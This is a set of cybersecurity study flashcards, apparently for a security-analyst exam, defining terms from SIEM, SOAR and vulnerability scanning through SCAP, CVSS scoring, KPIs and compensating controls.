• 0 Emergency (emerg): system is unusable.
• 1 Alert (alert): immediate action required.
• 2 Critical (crit): critical conditions.
• 3 Error (error): error conditions.
• 4 Warning (warn): warning conditions.
• 5 Notice (notice): normal but significant conditions.
• 6 Informational (info): informational messages.
• 7 Debug (debug): messages helpful for debugging.
Term
Security information and event management (SIEM)
Definition
A solution that provides real-time or near-real-time analysis of security alerts generated by network hardware and applications.
Security information and event management (SIEM) automates the collection, analysis, and response to security-related data. This automation helps simplify identifying, analyzing, and responding to security threats, especially for events contained within log data.
Term
Security orchestration, automation, and response (SOAR)
Definition
A class of security tools that facilitates incident response, threat hunting, and security configuration by orchestrating automated runbooks and delivering data enrichment.
Security orchestration, automation, and response (SOAR) describes the process of using technology to automate the work of identifying, analyzing, and responding to security threats often flagged by a SIEM. SOAR tools frequently "bolt on" to a SIEM and trigger after an alert is generated. Instead of sending the alert to a security analyst for manual review, the alert is instead forwarded to a SOAR platform. The SOAR performs a series of tasks grouped within preestablished playbooks in response to the alert.
The SOAR extracts relevant fields from the alert and, using scripts or API integrations with other security tools, can evaluate events and data contained within the alert and respond to them accordingly. For well-defined event types, the SOAR can resolve the issue fully. For more complicated events, the SOAR will perform specific automated analyses and include them in a new alert for manual review. The SOAR, when properly implemented, can significantly reduce the number of false positives and the number of mundane tasks performed by security personnel and can also help to reduce the amount of time and manual labor required to monitor and respond to security threats. Additionally, SOAR tools help ensure that security threats are promptly identified and addressed, resulting in more effective mitigations and improved security.
Term
Analyze workflows
Identifying Tasks Suitable for Automation
Definition
SOC teams can analyze their workflows to identify repetitive or time-consuming tasks. Tasks that require significant manual efforts, such as data aggregation, correlation, and analysis, are good candidates for automation.
Term
Evaluate time-to-detection
Identifying Tasks Suitable for Automation
Definition
SOC teams can evaluate how long it takes them to detect and respond to security incidents. Tasks that contribute to delays in detection or response, such as manual data collection or analysis, are good candidates for automation.
Term
Identify high-risk areas
Identifying Tasks Suitable for Automation
Definition
SOC teams can identify areas of the organization at high risk of a cyber attack. Tasks critical to these areas' security, such as threat hunting or vulnerability scanning, are good candidates for automation.
Term
Consider the frequency of tasks
Identifying Tasks Suitable for Automation
Definition
SOC teams can consider how often they perform specific tasks. Tasks performed frequently, such as log analysis or malware scanning, are good candidates for automation.
Term
Evaluate the benefits of automation
Identifying Tasks Suitable for Automation
Definition
SOC teams can evaluate the benefits of automation for specific tasks, such as increased accuracy, faster response times, and reduced manual effort. Tasks that would benefit from these advantages are good candidates for automation
Term
Orchestrating Threat Intelligence Data
Definition
Data enrichment combines and analyzes data from disparate sources to gain a greater understanding of the threat landscape. This can involve combining different threat feeds to get a complete picture of the malicious actors, tools, and tactics that attackers use. It can also involve correlating data from multiple sources, such as network logs, endpoint data, and threat intelligence feeds, to identify and prioritize threats. By orchestrating threat intelligence data, organizations can better understand the threats they are facing and take preemptive action to protect their networks. With the right processes in place, organizations can effectively create a complete picture of the threat landscape and ensure they take the proper steps to stay ahead of cyber adversaries.
Term
Single pane of glass
Definition
A comprehensive, unified user interface that provides a comprehensive view of an IT environment and allows administrators to manage all connected components from one place. This type of interface simplifies the management of complex IT infrastructures
Term
application programming interface (API)
Definition
Methods exposed by a script or program that allow other scripts or programs to use it. For example, an API enables software developers to access functions of the TCP/IP network stack under a particular operating system.
In this context, an API is a set of functions and procedures that allow two or more applications to communicate with each other. An API defines the types of calls or requests that can be made, how to make them, the data formats that should be used, and the conventions to follow. It can also provide extension mechanisms so that software can extend its existing functionality.
Term
Webhooks
Definition
Automated messages sent from applications to other applications containing information about an event, such as the time it occurred, the data associated with it, and any other relevant information
Term
plugins & add-ons
Definition
Many security tools can have their functionality extended by adding additional features by way of plugins, add-ons, and apps. These additions help to tailor the software product to more closely match the infrastructure being managed from one organization to another. Some additions are free, and many require additional licensing.
Term
National Institute of Standards and Technology (NIST)
Definition
The National Institute of Standards and Technology (NIST) is a nonregulatory agency in the United States that establishes standards and best practices across the entire science and technology field. NIST publishes a wide variety of guidance and best practices within the field of information technology including cybersecurity. Within the field of cybersecurity, the special publication (SP) 800 series documents, as well as the Risk Management Framework and Cybersecurity Framework, are some of the most widely adopted and referenced materials in the industry. More information regarding NIST cybersecurity publications can be obtained via: https://www.nist.gov/cybersecurity.
Term
International Organization for Standardization (ISO)
Definition
Develops many standards and frameworks governing the use of computers, networks, and telecommunications, including ones for information security (27K series) and risk management (31K series).
ISO 27002, which defines security controls; 27017/27018 for cloud security; 27701, which focuses on personal data and privacy; and many others.
Term
Center for Internet Security (CIS) Benchmarks
Definition
The Center for Internet Security (CIS) benchmarks are a set of security configuration best practices developed by a consensus community of experts. They provide a secure baseline configuration for various operating systems, applications, and hardware devices. The benchmarks define best practice approaches to patching, hardening, and system logging and are the industry standard for secure configuration.
Several vulnerability scanners, such as the licensed version of Tenable's Nessus scanner, include configuration scanning options to compare an endpoint's active configuration to the settings detailed in a CIS benchmark.
Term
Open Web Application Security Project (OWASP)
Definition
The Open Web Application Security Project (OWASP) is a nonprofit foundation that works to improve the security of web applications and services. It is an international organization that provides unbiased, practical information about application security. The OWASP provides tools, documents, and other resources to help people build more secure software.
Term
Payment Card Industry Data Security Standard (PCI DSS)
Definition
Payment Card Industry Data Security Standard (PCI DSS) is a global data protection standard established and maintained by a consortium of payment card companies. PCI DSS identifies controls designed to prevent fraud and protect credit and debit card data. Organizations that take credit and debit cards are required to follow the standards described within the PCI DSS.
Term
Center for Internet Security (CIS)
Definition
A not-for-profit organization (founded partly by SANS). It publishes the well-known "Top 20 Critical Security Controls" (or system design recommendations).
Term
Internal Scans
Definition
Internal scans focus on the view from the "inside."
Internal scans are also important to protect systems from abuse from internal threats and to provide layered security. For example, if an attacker makes it past external protections, their job should still be difficult even if they have made it to the "inside." Internal scans should include detailed, comprehensive vulnerability information.
Term
External Scans
Definition
External scans focus on the view of devices and services from the "outside" of the network, broadly referring to the Internet.
Externally accessible (Internet-facing) systems are continuously pushed, poked, probed, scanned, enumerated, subjected to automated exploits, fingerprinted, and exposed to many other malicious actions. Paying close and careful attention to externally visible vulnerabilities is essential, and the approaches used to address any identified vulnerabilities should be swift.
Term
vulnerability scanner
Definition
Hardware or software that is configured with a list of known weaknesses and exploits and can scan for their presence in a host OS or particular application.
An infrastructure vulnerability scanner is a type of software that scans network hosts (client and servers) and intermediate systems (routers, switches, access points, and firewalls) for data such as patch level, security configuration and policies, network shares, unused accounts, weak passwords, rogue devices, antivirus configuration, and so on. A scanner can be implemented purely as software or as a security appliance connected to the network.
Term
Credentialed/Noncredentialed
Definition
Noncredentialed scans are simple to implement, produce a relatively low impact on the device, and provide insight regarding what vulnerabilities are discoverable to non-authenticated users, for example, someone with access to the network only.
Credentialed scans provide the most comprehensive evaluation of devices. By authenticating to the device, the scanner can enumerate all installed software, the file system, configuration data, user accounts, and many other attributes. Special care is needed when using credentialed scans, as the most effective scanner credentials also have privileged access. If the scanner does not correctly protect the credentials, or if staff are not careful to protect the credentials, they can be abused or potentially exposed and stolen. Accounts such as root, Domain Administrator, or Administrator are inappropriate for vulnerability scanning. Scanning endpoints should be done with purpose-specific and carefully provisioned credentials, granting only the necessary access.
Term
Agentless Scan
Definition
Agentless scans can be the simplest to implement, as the scanner can collect information from endpoints using protocols such as SSH, WMI, or SNMP. Some organizations do not allow the use of WMI or SNMP in response to risks associated with these protocols. Additionally, collecting data can become complicated when network firewalls are in the line of communication between the vulnerability scanner and the endpoints.
Term
Agent-based Scan
Definition
Agent-based scans require the installation of small, special-purpose software utilities designed to collect information from the endpoint and pass it to the vulnerability scanner. The advantages of agent-based scanning include improved vulnerability and host configuration data, less processing overhead on the vulnerability scanner server, and simplified communication across network firewalls. Agent-based scans require the deployment and installation of the agent software, which requires time and effort to test, deploy, and maintain. Adding agents to endpoints also adds a new attack vector and additional software to track and patch.
Term
Active Scan
Definition
Identifying vulnerabilities can be accomplished in many ways, and a vulnerability scanner is just one of them. Directly interacting with a device or software to identify vulnerabilities is called active scanning. Examples of active scanning include using a vulnerability scanner, enumerating services, performing banner grabbing, content enumeration, or using a web application scanner such as Burp Suite or OWASP ZAP.
Term
Passive Scan
Definition
Passive scanning describes methods used to identify vulnerabilities without direct interaction with a device or software. The primary example of this is network packet capture. By inspecting the traffic to and from a device, issues such as insecure protocols, cleartext credentials, inadequate encryption methods, DNS query data, and other problems are easily identifiable.
Term
scope of a scan
Definition
The scope of a scan refers to the range of hosts or subnets included within a single scan job. The scope is configured in the scan as a single IP address or range of IP addresses. For a large network, it is sensible to schedule scans of different portions of the network to occur at different times. This will reduce the impact on network performance and make it easier to analyze the results of each scan. Scans of limited scope can also be used to identify particular issues or meet a particular compliance goal. Asset criticality might also affect scanning scope, with targeted scans of critical assets being scheduled more often.
Term
Map/Discovery Scan
Definition
A map, or discovery, scan identifies the devices connected to a network or network segment. Discovery scans allow security teams to identify connected devices and uncover potential problems.
Term
Fingerprinting
Definition
Identifying the type and version of an operating system (or server application) by analyzing its responses to network scans.
Fingerprinting describes the effort taken to more specifically identify details about a device. Whereas a map or discovery scan looks for connected devices, a fingerprint scan looks to focus attention on an individual device to better understand its purpose, vendor, software versions, configuration details, and the existence of vulnerabilities.
Term
Static analysis
Definition
The process of reviewing uncompiled source code either manually or using automated tools.
Static analysis can be performed in a variety of ways. One method involves manual inspection of source code in order to identify vulnerabilities in programming techniques. Another approach uses specialty applications or add-ons to development tools that are designed to look for well-known programming methods and constructs that are known to be problematic.
Term
Dynamic analysis
Definition
Software testing that examines code behavior during runtime. It helps identify potential security issues, potential performance issues, and other problems.
Term
Fuzzing
Definition
A dynamic code analysis technique that involves sending a running application random and unusual input so as to evaluate how the app responds.
Term
Reverse engineering
Definition
The process of analyzing the structure of hardware or software to reveal more about how it functions
Reverse engineering describes deconstructing software and/or hardware to determine how it is crafted. Reverse engineering's objective is to determine how much information can be extracted from delivered software.
Reverse engineering is not limited to software. Hardware can be reverse engineered to better understand how it operates in order to insert malicious components, for the theft of intellectual property, and/or to carefully inspect how a device operates in order to confirm it meets security requirements or to determine if it has been tampered with. Reversing can be performed on all kinds of devices, and some examples might include security tokens, computer equipment, network and wireless equipment, cars, wearables, IoT devices, and many others.
Term
Compliance Scans and Regulatory Requirements
Definition
Legal and regulatory environments will usually be accompanied by a security framework or checklist of the controls and configuration settings that must be in place. Security software products such as IDS, SIEM, and vulnerability scanners can often be programmed with compliance templates and then scan for deviations from the template.
Some sources of external compliance may dictate a scanning frequency that your organization must follow; others take a more hands-off approach and simply require that you have a plan in place to scan at certain intervals.
Term
Center for Internet Security (CIS) benchmarks
Definition
CIS Benchmark configuration guides can be downloaded for free for non-commercial use (https://www.cisecurity.org/cis-benchmarks/) and include detailed descriptions of all configuration points, although the documents are very lengthy to use in this way. CIS offers a software tool for checking configurations, called CIS CAT, but access to the tool is limited to CIS Members. CIS Benchmarks™ are also available within the professional version of the Tenable Nessus vulnerability scanner, and CIS hardened images are available for deployment within major Cloud platforms, such as AWS or Azure.
Term
Segmentation
Definition
Enforcing a security zone by separating a segment of the network from access by the rest of the network. This could be accomplished using firewalls, VPNs, or VLANs. A physically separate network or host (with no cabling or wireless links to other networks) is referred to as air-gapped.
Term
segmentation scanning considerations
Definition
This segmentation has a performance benefit and a security benefit because traffic flows between zones are more predictable and easier to monitor and filter. When you perform vulnerability scanning across a segmented network, you need to consider the requirements and limitations:
- A server-based scanner must be able to communicate with remote subnets, possibly including multiple VLANs, and through one or more firewalls. Alternatively, multiple scanning host nodes can be deployed in multiple segments and configured to report back to a central management server.
- An agent-based scanner must be able to communicate reports to the management server.
Term
Performance Considerations
Definition
- Identification of Operating System: Identifying the operating system of the target system is essential to ensure that the correct vulnerability scans are used and to identify any unsupported or non-compliant operating system versions.
- Scanning Interval: Scanning should be done regularly to identify new vulnerabilities. Scans should run on an agreed automated schedule or use specialized agents that support near real-time vulnerability identification.
- Scan Speed: The scan speed is important as it can affect the accuracy of scan results. If a scan is too slow or too fast, it may miss important vulnerabilities and produce inaccurate results, or overwhelm the target system, resulting in negative performance impacts and downtime.
- Vulnerability Database: The accuracy of the scan results depends on the quality of the vulnerability database used. It is essential to use a comprehensive and up-to-date vulnerability database prior to performing a vulnerability scan.
- Scanning Type: Different types of scans can be performed to identify vulnerabilities in the target system. These include port scans, vulnerability scans, and comprehensive security configuration scans.
- Authentication: Authenticated scans are more comprehensive as they identify vulnerabilities using an authenticated session and have greater access to the host and software for deeper inspection. Unauthenticated scans have less performance impact on the target system but produce limited results compared to authenticated scans.
- False Positives: False positives are sometimes generated when vulnerability scans are performed. False positives represent invalid warnings generated by a scanner and waste the analyst's time researching and verifying the results.
Term
Vulnerability Scan Scheduling
Definition
Scheduling vulnerability scans is essential to maintaining a secure environment and is often required to maintain regulatory compliance. Vulnerability scans help identify system weaknesses that malicious actors may exploit. By scheduling scans regularly, organizations can ensure that any newly discovered vulnerabilities are identified and addressed before they can be exploited. Regular vulnerability scans also help ensure that installed patches are effective and do not introduce new vulnerabilities. Additionally, vulnerability scans help identify misconfigurations and unauthorized changes. Scheduling vulnerability scans is important to ensure that an organization's systems and networks remain secure.
Term
Operations
Definition
Vulnerability scanning can unfortunately cause problems such as negatively impacting a system's performance or causing services to crash. For these reasons, it is important to carefully consider the needs of the organization prior to performing any type of vulnerability scan. It is common for vulnerability scanning activity to follow standard change management procedures to ensure all impacted parties are aware of scanning activity and the potential for problems.
Term
Data Sensitivity Levels
Definition
A data inventory, or data map, describes the mechanisms used to identify and track the data assets created, controlled, or maintained by an organization. The data inventory describes the data in terms of what it contains, such as intellectual property; customer data; third-party, confidential business data; and others, as well as its classification and sensitivity. Having a clear view of data is the first step in protecting it. Gaining full visibility is hindered by the complexity and dynamics of how data is stored as well as obtaining clear information regarding what each piece of identified data represents.
Term
Operational technology (OT)
Definition
Communications network designed to implement an industrial control system rather than data networking.
Operational technology (OT) is a term used to describe the hardware and software technologies used to manage physical devices, processes, and events within an organization. It is the type of technology used to monitor and control actual physical systems, processes, and events in the environment. Examples of OT include industrial control systems, robotics, sensors, Programmable Logic Controllers (PLCs), and SCADA systems, as well as the networks and devices used to operate them.
Term
Industrial control systems (ICSs)
Definition
Network managing embedded devices (computer systems that are designed to perform a specific, dedicated function)
Term
human-machine interfaces (HMIs).
Definition
Input and output controls on a PLC to allow a user to configure and monitor the system.
Term
data historian
Definition
Software that aggregates and catalogs data from multiple sources within an industrial control system.
Term
supervisory control and data acquisition (SCADA)
Definition
Type of industrial control system that manages large-scale, multiple-site devices and equipment spread over geographically large areas from a host computer
A supervisory control and data acquisition (SCADA) system takes the place of a control server in large-scale, multiple-site ICSs. SCADA systems typically run as software on ordinary computers, gathering data from and managing plant devices and equipment with embedded PLCs, referred to as field devices. SCADA systems typically use WAN communications, such as cellular or satellite, to link the SCADA server to field devices.
Term
Programmable logic controllers (PLCs)
Definition
Type of processor designed for deployment in an industrial or outdoor setting that can automate and monitor mechanical systems.
Term
Security Content Automation Protocol (SCAP)
Definition
A NIST framework that outlines various accepted practices for automating vulnerability scanning.
Security Content Automation Protocol (SCAP) describes a suite of interoperable specifications designed to standardize the formatting and naming conventions used to identify and report on the presence of software flaws, such as misconfigurations and/or vulnerabilities.
Term
Open Vulnerability and Assessment Language (OVAL)
Definition
An XML schema, maintained by MITRE, for describing system security state and querying vulnerability reports and information.
Open Vulnerability and Assessment Language (OVAL)—Helps describe three main aspects of an evaluated system including (1) system information, (2) machine state, and (3) reporting. Using OVAL provides a consistent and interoperable way to collect and assess information regardless of the security tools being used
Term
Asset Reporting Format (ARF)
Definition
As the name suggests, ARF helps to correlate reporting formats to assess information independently from any specific application or vendor product for consistency and interoperability.
Term
Extensible Configuration Checklist Description Format (XCCDF)
Definition
Written in XML, XCCDF provides a consistent and standardized way to define benchmark information as well as configuration and security checks to be performed during an assessment.
Term
Common Platform Enumeration (CPE)
Definition
Scheme for identifying hardware devices, operating systems, and applications developed by MITRE.
Uses a syntax similar to Uniform Resource Identifiers (URI). CPE is a standardized naming format used to identify systems and software.
Term
Common Vulnerabilities and Exposures (CVE)
Definition
Scheme for identifying vulnerabilities developed by MITRE and adopted by NIST
A list of records where each item contains a unique identifier used to describe publicly known vulnerabilities. Unique identifiers begin with CVE, followed by the year of identification, and a unique number - CVE-YEAR-#####.
Term
Common Configuration Enumeration (CCE)
Definition
Scheme for provisioning secure configuration checks across multiple sources developed by MITRE and adopted by NIST.
Similar to CVE, except focused on configuration issues which may result in a vulnerability.
Term
Common Vulnerability Scoring System (CVSS)
Definition
A risk management approach to quantifying vulnerability data and then taking into account the degree of risk to different types of systems or information.
Term
Nessus
Definition
Nessus is a widely used vulnerability assessment tool to identify system vulnerabilities. It also enables organizations to gauge the risk associated with those vulnerabilities based on several factors, including the CVSS score.
Term
OpenSCAP
Definition
OpenSCAP is an open-source scanner used to identify system vulnerabilities. It also provides the ability to calculate a CVSS score based on the vulnerabilities identified in the system.
Term
Qualys
Definition
Qualys is another widely used vulnerability assessment tool to identify system vulnerabilities. It also provides the ability to calculate a CVSS score based on the vulnerabilities identified in a system.
Term
OpenVAS
Definition
OpenVAS is an open-source scanner used to identify vulnerabilities in systems. It also provides the ability to calculate a CVSS score based on the vulnerabilities identified in the system.
Term
SecurityScorecard
Definition
SecurityScorecard is a cloud-based solution that enables organizations to assess and improve their security posture. It also provides the ability to calculate a CVSS score based on the vulnerabilities identified in the system.
Term
CVSS metrics
Definition
Score: Description
0: None
0.1+: Low
4.0+: Medium
7.0+: High
9.0+: Critical
Term
CVSS Metrics
Definition
Base Metrics, with possible values and notes:
Attack Vector (AV)
Possible values: Physical (P), Local (L), Adjacent network (A), or Network (N)
Notes: The physical attack vector includes physical access to the system, such as accessing the device in person. The local attack vector consists of the ability to manipulate the system with local access, such as by using a USB-connected device. The network attack vector includes two distinct categories: adjacent network and network. Network (N) refers to connectivity from any location, whereas Adjacent network (A) describes access via the same broadcast domain. Network attacks include access to a system via the network and include actions such as sending malicious data packets or instructions. The attack vectors help organizations identify the best way to implement protections.
Attack Complexity (AC)
Possible values: High (H) or Low (L)
Notes: Refers to the difficulty of the attack techniques used by a threat actor. Low indicates a straightforward attack, and high indicates a more complicated attack. Attack complexity is important to consider when evaluating the risk posed by a vulnerability. If the attack complexity is high, it may be difficult or impossible for a threat actor to exploit the vulnerability, thus reducing the risk. On the other hand, if the attack complexity is low, the risk posed by the vulnerability is greater.
Privileges Required (PR)
Possible values: None (N), Low (L), or High (H)
Notes: This represents permissions such as guest or anonymous (N), standard user (L), and administrator (H).
User Interaction (UI)
Possible values: None (N) or Required (R)
Notes: Whether an exploit of the vulnerability depends on some local user action, such as executing a file attachment.
Scope (S)
Possible values: Unchanged (U) or Changed (C)
Notes: This indicates whether the exploit affects only the local security context (U) or not (C). For example, a hypervisor vulnerability might allow an exploit from one VM to other VMs.
Confidentiality (C), Integrity (I), and Availability (A)
Possible values: High (H), Low (L), or None (N)
Notes: Where the metrics above assess exploitability, these three separate metrics measure impacts to the CIA triad.
Term
Vulnerability Scans
Definition
Vulnerability scans check for open ports, protocol compliance, misconfigured firewalls or routers, unpatched software, cross-site scripting (XSS) problems, SQL injection weaknesses, and many other issues. The vulnerability scanning software creates simple informative output or a formal report identifying the vulnerabilities it discovered. Scan targets can include an individual system, a subnet, or logical grouping of assets, such as database, web, application servers, or perhaps industrial control systems. It is essential to save reports to establish trends over time that demonstrate the effectiveness of the vulnerability management program.
Term
False positive
Definition
When a vulnerability scan incorrectly indicates that a vulnerability or misconfiguration is present when it is not. For example, a scanner may identify that vulnerable software is present on an endpoint, but closer inspection reveals that it is not actually installed. This can sometimes happen when software uninstall routines leave traces of the original software. False positives are frustrating and waste valuable analyst time.
Term
True positive
Definition
When a vulnerability scan correctly identifies a vulnerability. For example, a true positive would be when a scan correctly identifies the presence of default credentials on network equipment.
Term
False negative
Definition
When a vulnerability scan incorrectly identifies that a vulnerability does not exist. For example, a vulnerability scan may report that a web server is using compliant cipher suites when it is not, because the scanner is misconfigured or uses an outdated signature engine during evaluation. False negatives are the most concerning issue as they represent a failure of the scanning tool to report on a legitimate issue. Using multiple scanning tools can mitigate the risk of false negatives because the scan outputs of each tool can be correlated to identify vulnerabilities more confidently.
Term
True negative
Definition
A vulnerability scan that correctly indicates that a system or device does not have a vulnerability.
Term
Weaponization
Definition
Assesses the likelihood that an attacker will be able to weaponize a vulnerability to achieve their objectives. This metric considers factors such as the attack vector (AV) and attack complexity (AC), which affect the ease with which an attacker can create a functional exploit. An attacker can easily use weaponized exploits to gain unauthorized access to a system, steal sensitive information, or carry out other malicious activities. Additionally, attackers can easily share weaponized exploits for others to use.
Term
Exploitability
Definition
A vulnerability with high exploitability is more likely to be targeted by an attacker and therefore requires urgent attention. Conversely, a vulnerability with low exploitability may be less urgent as it is less likely to be exploited. The exploitability of a vulnerability depends on many factors, including its attack complexity (AC), the availability of tools and techniques to exploit it (weaponization), and any security measures already in place to defend against the vulnerability. Vulnerability scanning tools and penetration testing can help quantify a vulnerability's exploitability. It is important to note that low exploitability does not mean that a vulnerability is not severe. Analysts must carefully consider all aspects of a vulnerability, including its potential impact, to make informed decisions about remediating it.
Term
zero-day
Definition
A zero-day represents an exploitable vulnerability with no available patch.
The lack of an available patch arises either because the vulnerability is new and a patch is not yet available, or because the vulnerability is entirely unknown to the software provider.
These vulnerabilities are highly valuable to attackers. Standard vulnerability scanning techniques cannot detect unknown zero-day exploits because the scanner depends upon a vulnerability database of known vulnerabilities.
Term
Asset value
Definition
An asset's value may influence a vulnerability's score. Highly valuable assets, like those with far-reaching impacts if breached, may have little tolerance for vulnerabilities, skewing all scores into the high/critical range.
Term
CVSS Score Calculations
Categories
Definition
- Impact—The potential damage or harm caused by the vulnerability.
- Exploitability—The ease and likelihood of exploiting a vulnerability.
- Remediation—The cost and effort required to fix the vulnerability.
Term
CVSS Score Calculations
Metrics:
Definition
- Scope—The number of systems and people affected by the vulnerability.
- Confidentiality—The extent to which data is disclosed.
- Integrity—The extent to which the system's functionality is changed or impaired.
- Availability—The extent to which a system is unavailable.
- Privacy—The extent to which the system's privacy is impacted.
- Operations—The extent to which the system's security is affected.
- Other—Any other relevant or important factors.
Term
Vulnerability Management Reporting Benefits
Definition
Increased awareness—A vulnerability management program helps organizations identify potential weaknesses in systems, software, and networks to help organizations reduce their risk of cyberattacks and ensure that the environment remains secure.
Term
Vulnerability Management Reporting Benefits
Improved response
Definition
Organizations can reduce the time it takes to respond to cybersecurity incidents by incorporating vulnerability management into their incident response plan to respond more effectively to cyber threats. For example, incident response processes can be used to help quickly mitigate newly identified, critical vulnerabilities.
Term
Vulnerability Management Reporting Benefits
Improved security posture
Definition
Vulnerability management reporting provides metrics and measures designed to track the progress and effectiveness of vulnerability management efforts.
Term
Vulnerability Management Reporting Benefits
Better compliance
Definition
Vulnerability management reporting capabilities are required to maintain compliance with regulations, laws, data privacy legislation, and security standards.
Term
Top 10 Lists
Definition
Using top 10 style lists (or top 5, 15, 20, etc.) can help highlight potential problems or focus on important activities, trends, or environmental changes. Some examples of top 10 lists include traffic volume by device, protocols by volume, inbound traffic protocols by volume, outbound protocols, top external IP connections, email volume by user, malware alerts by user, and many other metrics.
Term
Compliance Reports
Definition
Compliance reports provide a detailed overview of how an organization is adhering to the laws, regulations, and standards that apply to its operations. They are typically used to evaluate the effectiveness of an organization's compliance practices, assess the organization's compliance with applicable laws, and provide important information to stakeholders and regulators. Organizations can use compliance reports to demonstrate their commitment to compliance and help ensure that legal and regulatory requirements are being followed.
Term
Regulatory compliance reports
Definition
Prepared by qualified personnel and often include information on policies and procedures, internal audit results, employee training records, risk assessments, and other relevant data. The law, policy, contract, or regulation mandating the compliance report dictates its content.
Term
Internal compliance reports
Definition
Include assessments of endpoints to validate configuration per required secure configuration baselines, employee adherence to established procedures, vendor management practices, change management practices, user account management, and many other areas.
Term
Key Performance Indicators
Definition
KPIs help organizations measure progress toward goals and identify areas for improvement in operations. Any stage of the cybersecurity lifecycle can use KPIs—prevention, detection, or response. KPIs are essential for organizations to understand how their cybersecurity efforts are performing, and they can also use them to determine areas where the organization needs to improve.
KPIs provide this data by tracking metrics, such as the number of security incidents and the time it takes to detect them. KPIs also allow organizations to compare their cybersecurity efforts against other organizations and industry averages. This comparison can help identify where cybersecurity efforts are exceeding expectations and areas where they need to catch up. By tracking KPIs, organizations can determine if additional cybersecurity staff or equipment resources are required or if existing resources are working sufficiently.
Term
Examples of KPIs
Incidents
Definition
This KPI indicates the number of incidents an organization experiences, such as data breaches and cyberattacks. Organizations can track this KPI over time to determine if there is an upward or downward trend in incidents.
Term
Examples of KPIs
Detection Time
Definition
This KPI indicates the average time it takes to detect incidents. Organizations can use this metric to track how their incident response efforts are improving over time. They can also compare the detection time to industry averages to see where they can improve.
Term
Examples of KPIs
Indicators of Compromise (IoCs)
Definition
This KPI indicates the number of IoCs that organizations have in their systems and networks or that they have identified in others' systems. Organizations can track this KPI over time to determine if the IoCs are increasing in their environment.
Term
Examples of KPIs
Threats
Definition
This KPI indicates the number of threats organizations know about and have identified. Organizations can track this KPI over time to determine if the number of threats increases.
Term
Examples of KPIs
Risk Assessment
Definition
This KPI indicates the organization's risk assessment results. Organizations can compare their risk assessments with those of other organizations to see if they are on par.
Term
Examples of KPIs
Resource Allocation
Definition
This KPI indicates the percentage of cybersecurity resources organizations allocate to different areas, such as prevention and detection. Organizations can track this KPI over time to determine if they are allocating an appropriate percentage of resources to each function.
Term
Service Level Objectives (SLOs)
Definition
Service level objectives (SLOs) are essential in any customer-oriented operation. SLOs provide a benchmark by which security operations can measure their performance and help ensure they meet leadership's expectations. Service level objectives must be measurable, achievable, and realistic, like any goal-setting initiative. This means that security operations teams should set targets that are attainable but also challenging enough to foster growth. Additionally, SLOs should be flexible and adaptable as the cybersecurity landscape and organization's capabilities change over time.
Term
Action Plans
Definition
Action plans provide direction and focus, enabling organizations to achieve strategic goals and objectives. Action plans help frame how to measure progress because they outline the steps, resources, and timelines required to achieve specific goals. Action plans should be tailored to each organization's unique needs and regularly updated to reflect changes in the business environment.
An action plan should begin with a clear statement of the desired outcome followed by a detailed description of the steps and resources needed to reach the desired result. Including measurable goals and objectives in the action plan ensures that leadership can track progress.
Once the action plan is in place, leadership must track progress and adjust the plan as warranted to ensure goals are realistic and achievable. Sometimes tasks progress differently than the original plan. When this happens, it may indicate that the plans need to be adjusted, the time frames are unrealistic, or that additional resources are needed to stay on track.
Action plans are a critical component in response to a vulnerability report. When a vulnerability report identifies that problems exist in the environment, the race is on to implement fixes!
Leadership teams use several approaches to reduce risks, like investing in new security software, making configuration changes, updating policies within an organization, and many other options.
Term
Security Vulnerabilities
Definition
- Unpatched software—Applying the most recent security patches released by the software vendor can mitigate most vulnerabilities.
- Weak passwords—Passwords are often the first line of defense in protecting systems and data. When passwords are easy to guess or crack, they expose systems to unauthorized access.
- Outdated operating systems—Legacy operating systems do not receive security patches and often have many easily exploitable vulnerabilities. Replacing or upgrading operating systems can be difficult, and it is not uncommon to find legacy operating systems still in use by many organizations despite the risks they pose.
- Inadequate infrastructure protection—When firewalls, antimalware tools, and access controls are not correctly configured or maintained, they leave networks vulnerable.
- Misconfigurations—Working under time constraints, staff frequently provision services using default settings, guessing, or using Google for help. Additionally, staff often disable secure settings to resolve problems in response to trouble tickets.
Term
Response to Security Vulnerability
Definition
- Regularly testing systems—It is essential to regularly test systems to ensure they operate correctly and identify potential weaknesses. Testing should include internal and external systems maintained by providers that the organization is dependent on.
- Limiting access—Limiting who has access to systems and networks that store or process sensitive data is an effective way to protect it.
- Monitoring—This includes monitoring internal systems, such as servers, and externally accessible systems, such as web servers. Regularly scanning systems for vulnerabilities and quickly repairing issues is an effective way to guard against data breaches.
Term
Establishing Security Policies
Definition
An essential method to improve security is establishing robust security policies and procedures within an organization. Writing down requirements and expectations in policies and procedures leaves little doubt for staff trying to understand expectations. Additionally, leadership teams can effectively enforce expectations when they are properly documented. Policies and procedures should include everything from the requirement for strong passwords, limiting access to sensitive data, change management, provisioning or de-provisioning software and services, managing user accounts, patching, scanning, incident response, and many other areas. It is also critical to regularly evaluate the effectiveness of policies and procedures to ensure that they are working as intended.
Term
Training Staff
Definition
It has been well established that one of the best ways to protect against attacks is to train employees to recognize security issues and know how to respond to them. Awareness and skills development training are essential, but training on existing organizational policies and procedures is also critical. It is also necessary to regularly test employees to ensure they have retained the information or developed the skills addressed in their training.
Term
Software Patching
Definition
Security patches released by developers are often the first line of defense against successfully exploiting software vulnerabilities. It is essential to keep track of patch releases and regularly scan the environment to identify any missing patches. Timely application of patches ensures that software remains secure and up to date. Patches are applied to software using many approaches, including automatic updates, manual installation, and centrally administered patch deployment systems. Automatic updates are highly effective because they ensure that patches are applied as soon as they are released. Despite this, organizations must test most patches before deployment to ensure they do not cause problems or introduce bugs. Manual installation is less effective because patches may not be promptly applied, but this approach offers the highest amount of control.
Term
Compensating Controls
Definition
Compensating controls address security risks when traditional measures, such as software upgrades, multifactor authentication, encryption, and other similar controls, are not viable. This can happen when systems do not support modern security features or when these changes break business-critical operations. Many organizations use complicated and highly integrated systems that are extremely difficult to change, upgrade, and maintain. Compensating controls provide additional layers of security to protect against malicious or accidental breaches.
Compensating controls are typically used when an organization cannot implement a more traditional security measure due to cost, complexity, or other factors. For example, if an organization cannot afford to implement a biometric authentication system, they may instead use compensating controls such as two-factor authentication. Compensating controls can also be used when a security measure is not available, such as in the case of legacy systems.
Compensating controls provide protection when circumstances prevent the use of primary security measures. Compensating controls act as an alternative method of protection. That is not to say that compensating controls cannot, or should not, be used together with primary controls. Compensating controls offer layered protections and keep systems and software safe by providing redundancy. If one control fails, there is another still providing protection.
Compensating controls should be tailored to the organization's specific security needs and should be regularly reviewed and updated to ensure they remain effective. Because they address specific risks, compensating controls should be evaluated individually and implemented with the same level of care and diligence as any other security measure.
